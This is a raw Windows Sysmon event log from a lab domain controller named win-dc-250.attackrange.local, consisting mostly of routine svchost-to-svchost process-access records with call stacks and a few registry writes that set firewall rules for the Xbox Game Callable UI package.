13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010762Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010761Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010760Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010759Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010758Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010757Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010756Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010755Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010754Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010753Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010752Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:59.357{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493S-1-5-21-2738482597-1131698221-3520544381-500v2.26|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|C=S-1-15-3-1|C=S-1-15-3-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|M=microsoft.xboxgamecallableui_cw5n1h2txyewy|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|D=C:\Windows\SystemApps\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\|PFN=Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy| 10341000x800000000000000010751Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010750Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010749Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010748Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010747Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010746Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010745Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010744Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:59.357{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{9073E6D2-25D1-4FB8-9BB5-93EA544A493D}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Platform=2:6:2|Platform2=GTEQ| 10341000x800000000000000010743Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010742Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010741Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:59.357{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{A6D4196B-F9FA-495D-B7E0-2BD8C6931294}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}| 10341000x800000000000000010740Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010739Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 